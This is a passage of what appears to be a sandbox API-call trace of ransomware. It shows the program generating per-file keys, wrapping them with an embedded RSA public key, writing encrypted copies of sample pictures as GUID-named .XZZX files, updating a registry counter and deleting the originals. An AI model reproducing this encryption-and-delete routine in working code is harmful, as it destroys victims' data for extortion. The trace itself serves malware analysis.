CryptEncrypt (in: hKey=0x3d118d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x47fd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x47fd3f0*=0x80) returned 1 [0144.111] CryptEncrypt (in: hKey=0x3d118d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43799d0*, pdwDataLen=0x47fd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43799d0*, pdwDataLen=0x47fd3e8*=0x80) returned 1 [0144.111] WriteFile (in: hFile=0x8c8, lpBuffer=0x43799d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x47fe438, lpOverlapped=0x0 | out: lpBuffer=0x43799d0*, lpNumberOfBytesWritten=0x47fe438*=0x80, lpOverlapped=0x0) returned 1 [0144.111] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0144.111] WriteFile (in: hFile=0x8c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x47fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x47fe438*=0x5, lpOverlapped=0x0) returned 1 [0144.111] GetUserNameW (in: lpBuffer=0x47fe1f8, pcbBuffer=0x47fdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x47fdfe0) returned 1 [0144.111] wsprintfW (in: param_1=0x47fdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0144.112] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x47fdfe4 | out: phkResult=0x47fdfe4*=0x884) returned 0x0 [0144.112] RegQueryValueExW (in: hKey=0x884, lpValueName="E1010314", lpReserved=0x0, lpType=0x47fdfd8, lpData=0x47fdfec, lpcbData=0x47fdfdc*=0x4 | out: lpType=0x47fdfd8*=0x4, lpData=0x47fdfec*=0xce, lpcbData=0x47fdfdc*=0x4) returned 0x0 [0144.112] RegCloseKey (hKey=0x884) returned 0x0 [0144.112] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x47fdfe8 | out: phkResult=0x47fdfe8*=0x884) returned 0x0 [0144.112] RegSetValueExW (in: hKey=0x884, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x47fdfec*=0xcf, cbData=0x4 | out: lpData=0x47fdfec*=0xcf) returned 0x0 [0144.112] RegCloseKey (hKey=0x884) returned 0x0 [0144.112] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.112] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.112] CloseHandle (hObject=0x8c8) returned 1 [0144.217] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0144.217] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0144.217] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg")) returned 1 [0144.223] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg")) returned 0 Thread: id = 513 os_tid = 0xb64 [0143.745] lstrcpyA (in: lpString1=0x42efc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0143.745] lstrcpyW (in: lpString1=0x42ef460, lpString2="Desert.jpg" | out: lpString1="Desert.jpg") returned="Desert.jpg" [0143.745] lstrcpyW (in: lpString1=0x42ee860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0143.745] SetErrorMode (uMode=0x1) returned 0x1 [0143.746] lstrcpyW (in: lpString1=0x42ef860, lpString2="Desert.jpg" | out: lpString1="Desert.jpg") returned="Desert.jpg" [0143.746] CoCreateGuid (in: pguid=0x42ee440 | out: pguid=0x42ee440*(Data1=0x1247cbc4, Data2=0x3d50, Data3=0x4817, Data4=([0]=0x80, [1]=0x46, [2]=0x30, [3]=0x7c, [4]=0x6e, [5]=0x8, [6]=0x39, [7]=0xcb))) returned 0x0 [0143.746] wsprintfW (in: param_1=0x42eec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0143.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42efee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0143.746] wsprintfW (in: param_1=0x42ee450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\D1FD6140114402301247CBC41572E678.XZZX") returned 82 [0143.746] StrStrW (lpFirst="Desert.jpg", lpSrch="XZZX") returned 0x0 [0143.746] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", dwFileAttributes=0x20) returned 1 [0143.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8a4 [0143.747] ReadFile (in: hFile=0x8a4, lpBuffer=0x4560020, nNumberOfBytesToRead=0xce875, lpNumberOfBytesRead=0x42ee418, lpOverlapped=0x0 | out: lpBuffer=0x4560020*, lpNumberOfBytesRead=0x42ee418*=0xce875, lpOverlapped=0x0) returned 1 [0143.755] CloseHandle (hObject=0x8a4) returned 1 [0143.755] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0143.756] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x42f0000 [0143.756] SetErrorMode (uMode=0x1) returned 0x1 [0143.756] lstrcpyW (in: lpString1=0x42ee358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0143.756] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43798c0) returned 1 [0143.759] CryptGenKey (in: hProv=0x43798c0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11b18) returned 1 [0144.198] CryptExportKey (in: hKey=0x3d11b18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ee41c | out: pbData=0x0*, pdwDataLen=0x42ee41c*=0x94) returned 1 [0144.199] CryptExportKey (in: hKey=0x3d11b18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x42f0000, pdwDataLen=0x42ee41c | out: pbData=0x42f0000*, pdwDataLen=0x42ee41c*=0x94) returned 1 [0144.199] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0144.199] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0144.199] CryptDestroyKey (hKey=0x3d11b18) returned 1 [0144.199] CryptReleaseContext (hProv=0x4379a58, dwFlags=0x0) returned 0 [0144.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\D1FD6140114402301247CBC41572E678.XZZX" (normalized: "c:\\users\\public\\pictures\\sample pictures\\d1fd6140114402301247cbc41572e678.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x884 [0144.203] WriteFile (in: hFile=0x884, lpBuffer=0x4560020*, nNumberOfBytesToWrite=0xce875, lpNumberOfBytesWritten=0x42ee438, lpOverlapped=0x0 | out: lpBuffer=0x4560020*, lpNumberOfBytesWritten=0x42ee438*=0xce875, lpOverlapped=0x0) returned 1 [0144.261] SetFilePointer (in: hFile=0x884, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xce875 [0144.261] WriteFile (in: hFile=0x884, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ee438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ee438*=0x5, lpOverlapped=0x0) returned 1 [0144.261] SetFilePointer (in: hFile=0x884, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xce87a [0144.261] WriteFile (in: hFile=0x884, lpBuffer=0x42ef860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x42ee438, lpOverlapped=0x0 | out: lpBuffer=0x42ef860*, lpNumberOfBytesWritten=0x42ee438*=0x14, lpOverlapped=0x0) returned 1 [0144.261] SetFilePointer (in: hFile=0x884, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xce88e [0144.261] WriteFile (in: hFile=0x884, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ee438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ee438*=0x5, lpOverlapped=0x0) returned 1 [0144.261] SetFilePointer (in: hFile=0x884, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xce893 [0144.261] SetErrorMode (uMode=0x1) returned 0x1 [0144.261] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0144.261] OutputDebugStringW (lpOutputString="end") [0144.261] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ.\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42edbf4, pcbBinary=0x42ed3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42edbf4, pcbBinary=0x42ed3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0144.261] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42edbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42ed3dc, pcbStructInfo=0x42ed3d8 | out: pvStructInfo=0x42ed3dc, pcbStructInfo=0x42ed3d8) returned 1 [0144.261] CryptAcquireContextW (in: phProv=0x42ed3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42ed3e4*=0x4379ae0) returned 1 [0144.262] CryptImportPublicKeyInfo (in: hCryptProv=0x4379ae0, dwCertEncodingType=0x1, pInfo=0x3cf2480*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf24b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf24b8*, PublicKey.cUnusedBits=0x0), phKey=0x42ed3ec | out: phKey=0x42ed3ec*=0x3d11b18) returned 1 [0144.262] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0144.263] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0144.263] CryptEncrypt (in: hKey=0x3d11b18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42ed3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42ed3f0*=0x80) returned 1 [0144.263] CryptEncrypt (in: hKey=0x3d11b18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4379b68*, pdwDataLen=0x42ed3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4379b68*, pdwDataLen=0x42ed3e8*=0x80) returned 1 [0144.263] WriteFile (in: hFile=0x884, lpBuffer=0x4379b68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ee438, lpOverlapped=0x0 | out: lpBuffer=0x4379b68*, lpNumberOfBytesWritten=0x42ee438*=0x80, lpOverlapped=0x0) returned 1 [0144.263] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0144.263] WriteFile (in: hFile=0x884, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ee438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ee438*=0x5, lpOverlapped=0x0) returned 1 [0144.263] GetUserNameW (in: lpBuffer=0x42ee1f8, pcbBuffer=0x42edfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42edfe0) returned 1 [0144.263] wsprintfW (in: param_1=0x42edff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0144.263] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42edfe4 | out: phkResult=0x42edfe4*=0x890) returned 0x0 [0144.264] RegQueryValueExW (in: hKey=0x890, lpValueName="E1010314", lpReserved=0x0, lpType=0x42edfd8, lpData=0x42edfec, lpcbData=0x42edfdc*=0x4 | out: lpType=0x42edfd8*=0x4, lpData=0x42edfec*=0xcf, lpcbData=0x42edfdc*=0x4) returned 0x0 [0144.264] RegCloseKey (hKey=0x890) returned 0x0 [0144.264] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42edfe8 | out: phkResult=0x42edfe8*=0x890) returned 0x0 [0144.264] RegSetValueExW (in: hKey=0x890, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42edfec*=0xd0, cbData=0x4 | out: lpData=0x42edfec*=0xd0) returned 0x0 [0144.264] RegCloseKey (hKey=0x890) returned 0x0 [0144.264] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.264] VirtualFree (lpAddress=0x42f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.265] CloseHandle (hObject=0x884) returned 1 [0144.276] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0144.276] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0144.276] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg")) returned 1 [0144.282] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg")) returned 0 Thread: id = 514 os_tid = 0xb68 [0144.032] lstrcpyA (in: lpString1=0x48ffc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0144.032] lstrcpyW (in: lpString1=0x48ff460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0144.032] lstrcpyW (in: lpString1=0x48fe860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0144.032] SetErrorMode (uMode=0x1) returned 0x1 [0144.032] lstrcpyW (in: lpString1=0x48ff860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0144.032] CoCreateGuid (in: pguid=0x48fe440 | out: pguid=0x48fe440*(Data1=0xe4f6e079, Data2=0xd0a5, Data3=0x4b42, Data4=([0]=0x97, [1]=0xf5, [2]=0xb4, [3]=0xdb, [4]=0xf8, [5]=0x3d, [6]=0x6c, [7]=0x9f))) returned 0x0 [0144.032] wsprintfW (in: param_1=0x48fec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0144.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x48ffee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0144.032] wsprintfW (in: param_1=0x48fe450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\2980FDFD3D56218AE4F6E07941E605D2.XZZX") returned 82 [0144.032] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0144.032] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini", dwFileAttributes=0x20) returned 1 [0144.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x884 [0144.121] ReadFile (in: hFile=0x884, lpBuffer=0x3d126f0, nNumberOfBytesToRead=0x460, lpNumberOfBytesRead=0x48fe418, lpOverlapped=0x0 | out: lpBuffer=0x3d126f0*, lpNumberOfBytesRead=0x48fe418*=0x460, lpOverlapped=0x0) returned 1 [0144.122] CloseHandle (hObject=0x884) returned 1 [0144.122] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0144.122] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0144.122] SetErrorMode (uMode=0x1) returned 0x1 [0144.122] lstrcpyW (in: lpString1=0x48fe358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0144.122] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x4379a58) returned 1 [0144.125] CryptGenKey (in: hProv=0x4379a58, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11b58) returned 1 [0144.403] CryptExportKey (in: hKey=0x3d11b58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x48fe41c | out: pbData=0x0*, pdwDataLen=0x48fe41c*=0x94) returned 1 [0144.404] CryptExportKey (in: hKey=0x3d11b58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x48fe41c | out: pbData=0x40a0000*, pdwDataLen=0x48fe41c*=0x94) returned 1 [0144.404] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0144.404] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0144.404] CryptDestroyKey (hKey=0x3d11b58) returned 1 [0144.404] CryptReleaseContext (hProv=0x4379bf0, dwFlags=0x0) returned 0 [0144.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\2980FDFD3D56218AE4F6E07941E605D2.XZZX" (normalized: "c:\\users\\public\\pictures\\sample pictures\\2980fdfd3d56218ae4f6e07941e605d2.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x894 [0144.405] WriteFile (in: hFile=0x894, lpBuffer=0x3d126f0*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x48fe438, lpOverlapped=0x0 | out: lpBuffer=0x3d126f0*, lpNumberOfBytesWritten=0x48fe438*=0x460, lpOverlapped=0x0) returned 1 [0144.406] SetFilePointer (in: hFile=0x894, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x460 [0144.406] WriteFile (in: hFile=0x894, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x48fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x48fe438*=0x5, lpOverlapped=0x0) returned 1 [0144.406] SetFilePointer (in: hFile=0x894, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x465 [0144.406] WriteFile (in: hFile=0x894, lpBuffer=0x48ff860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x48fe438, lpOverlapped=0x0 | out: lpBuffer=0x48ff860*, lpNumberOfBytesWritten=0x48fe438*=0x16, lpOverlapped=0x0) returned 1 [0144.406] SetFilePointer (in: hFile=0x894, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x47b [0144.406] WriteFile (in: hFile=0x894, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x48fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x48fe438*=0x5, lpOverlapped=0x0) returned 1 [0144.406] SetFilePointer (in: hFile=0x894, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x480 [0144.406] SetErrorMode (uMode=0x1) returned 0x1 [0144.406] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0144.406] OutputDebugStringW (lpOutputString="end") [0144.407] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ\x8f\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x48fdbf4, pcbBinary=0x48fd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x48fdbf4, pcbBinary=0x48fd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0144.407] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x48fdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x48fd3dc, pcbStructInfo=0x48fd3d8 | out: pvStructInfo=0x48fd3dc, pcbStructInfo=0x48fd3d8) returned 1 [0144.407] CryptAcquireContextW (in: phProv=0x48fd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x48fd3e4*=0x4379c78) returned 1 [0144.407] CryptImportPublicKeyInfo (in: hCryptProv=0x4379c78, dwCertEncodingType=0x1, pInfo=0x3cf2bd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2c00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2c08*, PublicKey.cUnusedBits=0x0), phKey=0x48fd3ec | out: phKey=0x48fd3ec*=0x3d11b58) returned 1 [0144.407] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0144.408] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0144.408] CryptEncrypt (in: hKey=0x3d11b58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x48fd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x48fd3f0*=0x80) returned 1 [0144.408] CryptEncrypt (in: hKey=0x3d11b58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4379d00*, pdwDataLen=0x48fd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4379d00*, pdwDataLen=0x48fd3e8*=0x80) returned 1 [0144.408] WriteFile (in: hFile=0x894, lpBuffer=0x4379d00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x48fe438, 